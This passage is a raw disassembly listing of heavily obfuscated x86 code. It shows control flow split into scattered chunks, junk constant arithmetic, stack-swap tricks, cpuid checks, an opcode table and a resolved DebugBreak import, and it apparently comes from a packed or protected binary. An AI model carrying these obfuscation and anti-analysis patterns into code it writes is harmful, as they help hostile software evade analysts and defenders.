loc_426EC9: ; CODE XREF: _7hdaygc1:0042A7EA�j
push esi
rol ecx, 0Eh
; START OF FUNCTION CHUNK FOR sub_425E64
loc_426ECD: ; CODE XREF: sub_425E64:loc_42A7D4�j
sub ecx, 3ACEDCD7h
add ecx, 62B860A2h
xchg ecx, [esp+0]
jmp loc_42DC08
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424963
loc_426EE1: ; CODE XREF: sub_424963:loc_42B40B�j
xor edx, 8136242Dh
and edx, 7A44418Ah
rol edx, 0Fh
cmp edx, 0E38A6668h
jmp loc_42D6F5
; END OF FUNCTION CHUNK FOR sub_424963
; ---------------------------------------------------------------------------
push 0BB39EB9Dh
jmp sub_42742E
; =============== S U B R O U T I N E =======================================
sub_426F05 proc near ; CODE XREF: _7hdaygc1:004271BD�j
; sub_42D9E1:loc_4280F2�p
; FUNCTION CHUNK AT 00426911 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004271D7 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
rol eax, 19h
push ebx
mov ebx, eax
xchg ebx, [esp+0]
jmp loc_4271D7
sub_426F05 endp
; ---------------------------------------------------------------------------
loc_426F17: ; CODE XREF: _7hdaygc1:00429C85�j
xor ecx, 4DA40A61h
or ecx, 65377362h
sub ecx, 0A31F4A5h
add ecx, 14BD68CFh
xchg ecx, [esp]
jmp loc_4284DD
; ---------------------------------------------------------------------------
loc_426F37: ; DATA XREF: sub_4288FE-42F4�o
xchg eax, [esp]
push 0FFFFFFFFh
push offset sub_42E43B
jmp locret_42D127
; ---------------------------------------------------------------------------
loc_426F46: ; CODE XREF: _7hdaygc1:loc_427ED8�j
xchg eax, [esp]
push offset loc_428CC9
jmp locret_42DE40
; =============== S U B R O U T I N E =======================================
sub_426F53 proc near ; CODE XREF: sub_428B11+29A9�p
; _7hdaygc1:0042D153�j
xchg edx, [esp+0]
pop edx
push edx
push 0CCEE41B5h
pop edx
sub_426F53 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42E0C4
loc_426F5E: ; CODE XREF: sub_42E0C4-1A4�j
rol edx, 0Ch
add edx, 736D053Eh
jmp loc_428EB1
; END OF FUNCTION CHUNK FOR sub_42E0C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A62
loc_426F6C: ; CODE XREF: sub_426A62+6195�j
jz loc_428D63
jmp loc_42BD15
; END OF FUNCTION CHUNK FOR sub_426A62
; ---------------------------------------------------------------------------
locret_426F77: ; CODE XREF: _7hdaygc1:0042AA80�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A6C3
loc_426F78: ; CODE XREF: sub_42A6C3+37D8�j
jmp loc_4263B7
; END OF FUNCTION CHUNK FOR sub_42A6C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF91
loc_426F7D: ; CODE XREF: sub_42EF91:loc_4251E3�j
jmp loc_4241A3
; END OF FUNCTION CHUNK FOR sub_42EF91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABF7
loc_426F82: ; CODE XREF: sub_42ABF7-6E21�j
or ebp, 31D5E039h
cmp esi, edx
jmp loc_42FD9F
; END OF FUNCTION CHUNK FOR sub_42ABF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_426F8F: ; CODE XREF: sub_424F62+8843�j
sub eax, esi
xor ecx, esi
adc ebx, 6B9CD429h
loc_426F99: ; CODE XREF: sub_424F62:loc_42A35D�j
add dword ptr [esi], 0F80486h
; END OF FUNCTION CHUNK FOR sub_424F62
; START OF FUNCTION CHUNK FOR sub_424CE0
loc_426F9F: ; CODE XREF: _7hdaygc1:00423AF8�j
; _7hdaygc1:0042713E�j ...
xchg ebp, [esp+0]
loc_426FA2: ; CODE XREF: sub_424680+A451�j
mov edi, ebp
jmp loc_42688C
; END OF FUNCTION CHUNK FOR sub_424CE0
; ---------------------------------------------------------------------------
locret_426FA9: ; CODE XREF: _7hdaygc1:loc_427D0C�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB61
loc_426FAA: ; CODE XREF: sub_42BB61+1836�j
jmp sub_42828C
; END OF FUNCTION CHUNK FOR sub_42BB61
; ---------------------------------------------------------------------------
loc_426FAF: ; DATA XREF: sub_42D471:loc_42D474�o
xchg ecx, [esp]
mov ebp, esp
jno loc_426D5E
add esp, 0FFFFFFF4h
jmp loc_42BC50
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_426FC2: ; CODE XREF: sub_424F62:loc_42C60D�j
cmp esi, 85E4394Ah
jmp loc_42AEC3
; END OF FUNCTION CHUNK FOR sub_424F62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EE8A
loc_426FCD: ; CODE XREF: sub_42EE8A:loc_424FAA�j
jl loc_425AC6
cmp ecx, ebp
jmp loc_42711D
; END OF FUNCTION CHUNK FOR sub_42EE8A
; ---------------------------------------------------------------------------
locret_426FDA: ; CODE XREF: _7hdaygc1:0042D6E0�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B74A
loc_426FDB: ; CODE XREF: _7hdaygc1:loc_42BE3E�j
; sub_42B74A:loc_42D066�j
pop ebx
and ebx, 0BE71F483h
xor ebx, 6F2A1FA7h
add ebx, ebp
push offset loc_42C4C1
jmp nullsub_193
; END OF FUNCTION CHUNK FOR sub_42B74A
; ---------------------------------------------------------------------------
push 5B61B4F2h
shr edx, 0Dh
jmp sub_42BCF6
; ---------------------------------------------------------------------------
loc_427001: ; CODE XREF: _7hdaygc1:0042A54A�j
jnp loc_42C543
js loc_42F244
jmp sub_42C443
; ---------------------------------------------------------------------------
loc_427012: ; DATA XREF: sub_42E283-9DB7�o
push edx
push 0B2FCE2Bh
pop edx
or edx, 52E47199h
xor edx, 271F823Eh
add ebp, edx
pop edx
jmp loc_4261A9
; ---------------------------------------------------------------------------
add edx, eax
jmp sub_42D031
; ---------------------------------------------------------------------------
test edx, ebp
jmp loc_429613
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_172. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E58D
loc_42703C: ; CODE XREF: sub_42E58D+1�j
jmp loc_42DC0D
; END OF FUNCTION CHUNK FOR sub_42E58D
; ---------------------------------------------------------------------------
pop esi
jmp loc_425BAC
; ---------------------------------------------------------------------------
loc_427047: ; DATA XREF: sub_428342+1�o
mov ebp, esp
push offset sub_424AA8
jmp locret_425938
; ---------------------------------------------------------------------------
loc_427053: ; CODE XREF: _7hdaygc1:loc_42A0ED�j
xchg ebp, [edx]
xor ebp, 5C7E96F2h
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42705B: ; CODE XREF: sub_42C16F:loc_42A0D0�j
add edx, 140FB60Ah
add edx, ebp
add edx, 0CBEC29F0h
mov edx, [edx]
jmp loc_428404
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
loc_427070: ; CODE XREF: _7hdaygc1:loc_42E5E5�j
jl loc_4257FA
; START OF FUNCTION CHUNK FOR sub_423A6D
loc_427076: ; CODE XREF: sub_423A6D:loc_423A78�j
jmp loc_42365D
; END OF FUNCTION CHUNK FOR sub_423A6D
; ---------------------------------------------------------------------------
xor ecx, edx
sbb ebp, 478C7B43h
jmp loc_4257F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_427088: ; CODE XREF: sub_42C443:loc_42EBAE�j
mov edx, 0FFFFFFFFh
push edx
push edx
mov edx, eax
push offset loc_42F4DF
jmp loc_42F6D3
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425492
loc_42709B: ; CODE XREF: sub_425492+6�j
cmp ds:dword_42B9B8, 0
jnz loc_423E70
jmp loc_42A282
; END OF FUNCTION CHUNK FOR sub_425492
; ---------------------------------------------------------------------------
jb loc_42A40D
jmp sub_42E168
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_4270B8: ; CODE XREF: sub_423172:loc_4239FD�j
jnz loc_424E4D
jmp loc_42623D
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
pushf
jmp loc_425816
; ---------------------------------------------------------------------------
loc_4270C9: ; CODE XREF: _7hdaygc1:0042E7AE�j
jnz loc_42326C
jmp loc_42F487
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_4270D4: ; CODE XREF: sub_423DFC:loc_42E5DB�j
add eax, 155BA3Fh
mov eax, [eax]
mov ecx, [eax]
mov edx, [ebp-10h]
jmp loc_425AEE
; END OF FUNCTION CHUNK FOR sub_423DFC
; =============== S U B R O U T I N E =======================================
sub_4270E6 proc near ; CODE XREF: _7hdaygc1:00424B93�j
; sub_42FA3D:loc_42FA3E�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423850 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00424593 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042516A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00425C7C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428088 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AE8D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042C310 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042C9F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D06C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FCC0 SIZE 0000000D BYTES
xchg ebx, [esp+0]
pop ebx
call sub_42AE9C
pop ecx
loc_4270F0: ; CODE XREF: _7hdaygc1:00423A12�j
; _7hdaygc1:loc_4265DD�j ...
mov eax, 3FFh
call sub_42EF30
add eax, 2710h
push edx
jmp loc_42AE8D
sub_4270E6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DDF5
loc_427105: ; CODE XREF: sub_42DDF5:loc_4253FB�j
call sub_42CBC5
loc_42710A: ; CODE XREF: _7hdaygc1:loc_42AE6F�j
add edx, 182E1800h
call sub_42C1AF
push edi
mov edi, eax
jmp loc_4293DF
; END OF FUNCTION CHUNK FOR sub_42DDF5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EE8A
loc_42711D: ; CODE XREF: sub_42EE8A-7EB5�j
jns sub_423C08
loc_427123: ; CODE XREF: sub_42EE8A:loc_42B162�j
or eax, ds:4000F6h
rol eax, 9
add eax, 3B7B0BCEh
jmp loc_426AEC
; END OF FUNCTION CHUNK FOR sub_42EE8A
; ---------------------------------------------------------------------------
loc_427137: ; DATA XREF: sub_428556+B�o
cpuid
cmp eax, 80000000h
jbe loc_426F9F
jmp loc_42BA7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_427149: ; CODE XREF: sub_42AA07:loc_425423�j
movzx eax, word ptr [eax+14h]
add eax, [ebp-4]
add eax, 18h
push offset loc_4286F4
jmp loc_42C9FE
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426315
loc_42715D: ; CODE XREF: sub_426315:loc_42DD27�j
push eax
call sub_426CBB
push ebx
push 0BF38EC43h
pop ebx
xor ebx, 908D77FCh
add ebx, 0D04A6445h
jmp loc_4286BF
; END OF FUNCTION CHUNK FOR sub_426315
; ---------------------------------------------------------------------------
loc_42717B: ; DATA XREF: sub_423648+383E�o
sub eax, [ebp-4]
mov [ebp-4], eax
jmp loc_42D112
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427186 proc near ; CODE XREF: sub_42F1C6-8613�p
; sub_42F1C6-4BE0�p
push ebp
mov ebp, esp
push offset sub_429532
jmp nullsub_10
sub_427186 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D8E
loc_427193: ; CODE XREF: sub_427D8E-BE9�j
; sub_427D8E+10�j ...
jno loc_4271B0
loc_427199: ; CODE XREF: _7hdaygc1:loc_42959C�j
push eax
push 0
call sub_42B32F
pop eax
cmp dword ptr [eax], 0
jnz loc_427193
jmp sub_427D8E
; ---------------------------------------------------------------------------
loc_4271B0: ; CODE XREF: sub_427D8E:loc_427193�j
call sub_42951D
loc_4271B5: ; CODE XREF: sub_42948A+183E�j
jmp loc_42F617
; END OF FUNCTION CHUNK FOR sub_427D8E
; ---------------------------------------------------------------------------
shl eax, 0Ah
jmp sub_426F05
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A92E
loc_4271C2: ; CODE XREF: sub_42A92E:loc_42CA8B�j
jz loc_42C59C
; END OF FUNCTION CHUNK FOR sub_42A92E
; START OF FUNCTION CHUNK FOR sub_42AA9B
loc_4271C8: ; CODE XREF: sub_42AA9B+2D2E�j
jmp loc_4261F4
; END OF FUNCTION CHUNK FOR sub_42AA9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4287D8
loc_4271CD: ; CODE XREF: sub_4287D8+74E�j
jmp loc_42AD2B
; END OF FUNCTION CHUNK FOR sub_4287D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425D65
loc_4271D2: ; CODE XREF: sub_425D65+2593�j
jmp loc_42E802
; END OF FUNCTION CHUNK FOR sub_425D65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F05
loc_4271D7: ; CODE XREF: sub_426F05+D�j
jmp loc_426911
; END OF FUNCTION CHUNK FOR sub_426F05
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E85F
loc_4271DC: ; CODE XREF: sub_42E85F:loc_423EE0�j
jmp loc_4291F8
; END OF FUNCTION CHUNK FOR sub_42E85F
; ---------------------------------------------------------------------------
pop ecx
jge loc_42DE88
jmp loc_42C596
; ---------------------------------------------------------------------------
push edi
push 3E9B8A32h
pop edi
rol edi, 1
add edi, 82C8EB9Ch
xchg edi, [esp]
jmp loc_42DDCC
; ---------------------------------------------------------------------------
loc_427204: ; CODE XREF: _7hdaygc1:0042B86C�j
jnb loc_42B2B1
; START OF FUNCTION CHUNK FOR sub_42D84A
loc_42720A: ; CODE XREF: sub_42D84A+BC8�j
add ecx, 0F6B661E9h
xchg ecx, [esp+0]
push offset loc_429946
loc_427218: ; CODE XREF: sub_428B5B:loc_426EB3�j
jmp loc_42C158
; END OF FUNCTION CHUNK FOR sub_42D84A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_42721D: ; CODE XREF: sub_4253A0:loc_42935C�j
call sub_42EB0D
loc_427222: ; CODE XREF: sub_42BD03+D�j
jmp loc_424DFB
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424494
loc_427227: ; CODE XREF: sub_424494+B�j
; sub_425670+9�j ...
mov eax, ds:dword_42515C
call sub_42B650
mov esp, ebp
push offset loc_424244
jmp nullsub_11
; END OF FUNCTION CHUNK FOR sub_424494
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B11
loc_42723D: ; CODE XREF: sub_428B11+6BD3�j
jnz loc_4295D5
jmp loc_42E62D
; END OF FUNCTION CHUNK FOR sub_428B11
; =============== S U B R O U T I N E =======================================
sub_427248 proc near ; CODE XREF: _7hdaygc1:0042CCB0�p
; _7hdaygc1:0042F836�j
; FUNCTION CHUNK AT 0042A99E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042FC66 SIZE 0000000D BYTES
xchg ebx, [esp+0]
pop ebx
xor ecx, ecx
xor edx, edx
cpuid
jmp loc_42FC66
sub_427248 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_427257: ; CODE XREF: _7hdaygc1:00424CC3�j
; _7hdaygc1:loc_4260E4�j
call sub_42FAB8
; START OF FUNCTION CHUNK FOR sub_424680
loc_42725C: ; CODE XREF: sub_424680+64CD�j
jmp loc_42EAC9
; END OF FUNCTION CHUNK FOR sub_424680
; ---------------------------------------------------------------------------
jo loc_4253A8
jmp sub_427D11
; ---------------------------------------------------------------------------
loc_42726C: ; CODE XREF: _7hdaygc1:loc_42E809�j
cmp dword ptr [ebp-0Ch], 0
jle loc_42AAD9
; START OF FUNCTION CHUNK FOR sub_42C369
loc_427276: ; CODE XREF: _7hdaygc1:004248B9�j
; sub_42C369-1896�j ...
mov eax, [ebp-8]
movzx eax, byte ptr [eax]
jmp loc_42E93F
; END OF FUNCTION CHUNK FOR sub_42C369
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42742E
loc_427281: ; CODE XREF: sub_42742E+72A8�j
adc edi, ebp
jmp loc_424C36
; END OF FUNCTION CHUNK FOR sub_42742E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_427288: ; CODE XREF: sub_4232DA+643A�j
rol esi, 4
jmp sub_42EB0D
; END OF FUNCTION CHUNK FOR sub_4232DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_427290: ; CODE XREF: sub_425E64+8CA4�j
adc esi, 0CC49D1EDh
jg loc_42D519
jmp loc_42A54F
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_4272A1: ; CODE XREF: sub_4291EA-458�j
or ebp, ecx
loc_4272A3: ; CODE XREF: sub_4291EA:loc_4260F0�j
xor eax, 0A36718B3h
add eax, 64EEF958h
mov eax, [eax]
or eax, eax
jnz loc_425519
jmp loc_42C990
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_4272BE: ; CODE XREF: sub_423172+3325�j
mov ecx, eax
xchg ecx, [esp-4+arg_0]
call sub_42B650
retn
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
db 0Fh, 8Ah, 4Ch
db 0Ch, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_4272CF proc near ; CODE XREF: sub_42AD16:loc_42BDA8�p
; FUNCTION CHUNK AT 0042A3F0 SIZE 00000002 BYTES
xchg edx, [esp+0]
pop edx
mov esp, ebp
jmp loc_42A3F0
sub_4272CF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A62
loc_4272DA: ; CODE XREF: sub_426A62:loc_426281�j
sub eax, 0AD042A5h
and eax, 9264DB03h
add eax, 6DDBC100h
call sub_42828C
push offset sub_42E973
jmp loc_42DC31
; END OF FUNCTION CHUNK FOR sub_426A62
; =============== S U B R O U T I N E =======================================
sub_4272FB proc near ; CODE XREF: _7hdaygc1:loc_427FA0�j
; _7hdaygc1:0042CFF2�j ...
; FUNCTION CHUNK AT 00424935 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426B12 SIZE 00000008 BYTES
xchg edx, [esp+0]
pop edx
push ebx
push 2E820EBh
pop ebx
xor ebx, 21B70E69h
or ebx, 7B519474h
add ebx, 84E305DEh
jmp loc_424935
sub_4272FB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426BF7
loc_42731D: ; CODE XREF: sub_426BF7:loc_428609�j
mov eax, [eax]
push eax
call sub_426CBB
push 8EC6FAE5h
pop eax
add eax, 832EAC07h
jmp loc_427EDD
; END OF FUNCTION CHUNK FOR sub_426BF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DAF7
loc_427336: ; CODE XREF: sub_42DAF7:loc_425160�j
add eax, 0DCD09C4Fh
mov eax, [eax]
push eax
push edi
mov edi, esi
xchg edi, [esp+8+var_8]
push 427144ACh
loc_42734A: ; CODE XREF: _7hdaygc1:loc_42F961�j
xor esi, ebx
jmp loc_4290E9
; END OF FUNCTION CHUNK FOR sub_42DAF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_427351: ; CODE XREF: sub_42AA07:loc_42AA0C�j
rol eax, 3
cmp eax, 4D7139D1h
jmp loc_4231C6
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
locret_42735F: ; CODE XREF: _7hdaygc1:00423325�j
retn
; ---------------------------------------------------------------------------
loc_427360: ; CODE XREF: _7hdaygc1:0042E310�j
jmp loc_428DA8
; ---------------------------------------------------------------------------
db 0Fh, 8Ah, 16h
dd 0E9FFFFD1h, 2B4Bh, 840FC084h, 837Bh, 0FFD0BEE9h
; ---------------------------------------------------------------------------
call dword ptr [eax-3Fh] ; DATA XREF: sub_42C002:loc_4273D9�o
enter 0FFFFE804h, 41h
add byte ptr [eax], 0
; START OF FUNCTION CHUNK FOR sub_42B470
loc_427386: ; CODE XREF: sub_42B470:loc_427E71�j
mov esi, ecx
xchg esi, [esp+8+var_8]
mov esp, ebp
pop ebp
jmp loc_426E6B
; END OF FUNCTION CHUNK FOR sub_42B470
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9E1
loc_427393: ; CODE XREF: sub_42B9E1:loc_42B9EA�j
sub ebx, 10000h
mov eax, [ebx]
neg eax
cmp ax, 0A5B3h
jnz loc_42B9EA
jmp nullsub_39
; END OF FUNCTION CHUNK FOR sub_42B9E1
; ---------------------------------------------------------------------------
loc_4273AC: ; CODE XREF: _7hdaygc1:00424319�j
jnp loc_428ADB
pop ebp
jmp sub_42862C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42524F
loc_4273B8: ; CODE XREF: sub_42524F:loc_4236D6�j
call sub_429E35
; END OF FUNCTION CHUNK FOR sub_42524F
; START OF FUNCTION CHUNK FOR sub_42F05E
loc_4273BD: ; CODE XREF: sub_42F05E:loc_42DA91�j
call sub_4252C8
loc_4273C2: ; CODE XREF: _7hdaygc1:0042548D�j
jmp loc_423036
; END OF FUNCTION CHUNK FOR sub_42F05E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_4273C7: ; CODE XREF: sub_429318+6593�j
ror ebx, 12h
; END OF FUNCTION CHUNK FOR sub_429318
; =============== S U B R O U T I N E =======================================
sub_4273CA proc near ; CODE XREF: sub_423DDB+BEBB�p
; FUNCTION CHUNK AT 00423AC0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042424C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425284 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004252E5 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00425388 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004256A5 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004259CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428C2C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A64E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C40B SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042C7D4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042D52B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042D875 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042F48C SIZE 0000001B BYTES
xchg edx, [esp+0]
pop edx
lea eax, [ebp-125h]
jmp loc_4259CD
sub_4273CA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C002
loc_4273D9: ; CODE XREF: sub_42C002:loc_42C011�j
push (offset loc_42737C+1)
jmp nullsub_44
; END OF FUNCTION CHUNK FOR sub_42C002
; =============== S U B R O U T I N E =======================================
sub_4273E3 proc near ; CODE XREF: sub_42D4B1-30E1�p
; _7hdaygc1:0042C2A6�j
xchg ecx, [esp+0]
pop ecx
mov eax, [ebp+8]
push offset loc_425605
jmp nullsub_12
sub_4273E3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_4273F4: ; CODE XREF: sub_42DD73-9B1�j
jo loc_42357F
or ebx, 0CB3DD8E7h
jmp loc_42955E
; END OF FUNCTION CHUNK FOR sub_42DD73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F05E
loc_427405: ; CODE XREF: sub_42F05E:loc_423594�j
mov eax, [ebp+8]
cmp dword ptr [eax-14h], 4
jnz loc_42A892
mov eax, [ebp+8]
cmp dword ptr [eax-4], 4
jnz loc_42A892
cmp dword ptr [ebp-10h], 0
jnz loc_42A635
jmp loc_424E38
; END OF FUNCTION CHUNK FOR sub_42F05E
; =============== S U B R O U T I N E =======================================
sub_42742E proc near ; CODE XREF: sub_426CBB-2D2C�p
; _7hdaygc1:00426F00�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424C36 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00427281 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042A792 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D216 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042E6D0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F25C SIZE 0000001B BYTES
xchg eax, [esp+0]
pop eax
mov eax, ds:dword_42E1C4
or eax, eax
jnz loc_42D216
jmp loc_42E6D0
sub_42742E endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_163. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291CE
loc_427446: ; CODE XREF: sub_4291CE+6�j
jmp loc_42877F
; END OF FUNCTION CHUNK FOR sub_4291CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42512A
loc_42744B: ; CODE XREF: sub_42512A+3130�j
jmp loc_423077
; END OF FUNCTION CHUNK FOR sub_42512A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_427450: ; CODE XREF: sub_423172+13�j
jmp loc_4283F4
; END OF FUNCTION CHUNK FOR sub_423172
; =============== S U B R O U T I N E =======================================
sub_427455 proc near ; DATA XREF: sub_4273CA:loc_42F49D�o
; FUNCTION CHUNK AT 0042537C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042670C SIZE 00000005 BYTES
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_42B644
mov eax, [ebp-4]
add eax, 3Ch
mov eax, [eax]
jmp loc_42670C
sub_427455 endp
; ---------------------------------------------------------------------------
db 0D5h, 0CFh, 6Dh
dword_427474 dd 2 ; sub_42CCFE-3DCD�r ...
dd 3 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h, 40h
dd 2 dup(1), 4 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h
dd 40h, 2 dup(1), 4 dup(2), 0C0h, 40h, 0
dd 1, 4 dup(2), 0C0h, 40h, 0
dd 1, 4 dup(2), 0C0h, 40h, 0
dd 401h, 4 dup(2), 0C0h, 40h, 0
dd 23h dup(1), 2 dup(2), 4 dup(0)
dd 40h, 42h, 0C0h, 0C2h, 4 dup(1), 10h dup(1E00h), 0C2h
dd 42h, 2 dup(0C2h), 0Ch dup(2), 0Ah dup(1), 60h, 5 dup(1)
dd 4 dup(8), 4 dup(1), 0C0h, 40h, 6 dup(1), 8 dup(0C0h)
dd 8 dup(40h), 2 dup(1C2h), 20h, 1, 2 dup(2), 0C2h, 42h
dd 1E0h, 1, 20h, 2 dup(1), 0C0h, 2 dup(1), 4 dup(2), 2 dup(0C0h)
dd 2 dup(1), 8 dup(2), 4 dup(1A00h), 4 dup(0C0h), 800h
dd 0A00h, 60h, 1A00h, 4 dup(1), 0
dd 1, 2 dup(0)
dd 2 dup(1), 2 dup(2), 6 dup(1), 2 dup(2)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E076
loc_427874: ; CODE XREF: sub_42E076:loc_42E086�j
jmp loc_4251B3
; END OF FUNCTION CHUNK FOR sub_42E076
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_427879: ; CODE XREF: sub_425E64+7C52�j
jmp loc_42F277
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
loc_42787E: ; CODE XREF: _7hdaygc1:00425DEA�j
jmp loc_424870
; ---------------------------------------------------------------------------
db 68h
dword_427884 dd 2 dd 3 dup(2), 1Ch dup(1), 5 dup(2), 1, 2, 19h dup(1), 10h dup(402h)
dd 10h dup(1), 0Bh dup(2), 3 dup(1), 2 dup(2), 1, 3 dup(0C2h)
dd 3 dup(2), 7 dup(1), 2 dup(2), 10h dup(0E00h), 10h dup(402h)
dd 3 dup(1), 2, 1C2h, 3 dup(2), 3 dup(1), 2, 1C2h, 0Bh dup(2)
dd 2 dup(1), 1C2h, 7 dup(2), 5 dup(1), 2, 9 dup(1), 3 dup(2)
dd 1, 2, 2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2, 1, 2 dup(2)
dd 2 dup(1), 2, 2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2
dd 1, 3 dup(2), 1, 2, 2 dup(1), 3 dup(2), 1, 3 dup(2)
dd 1
dword_427C84 dd 7C859B72h ; resolved to->KERNEL32.DebugBreak ; sub_425C3B+8460�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D01B
loc_427C88: ; CODE XREF: sub_42D01B+11�j
jmp loc_42D81F
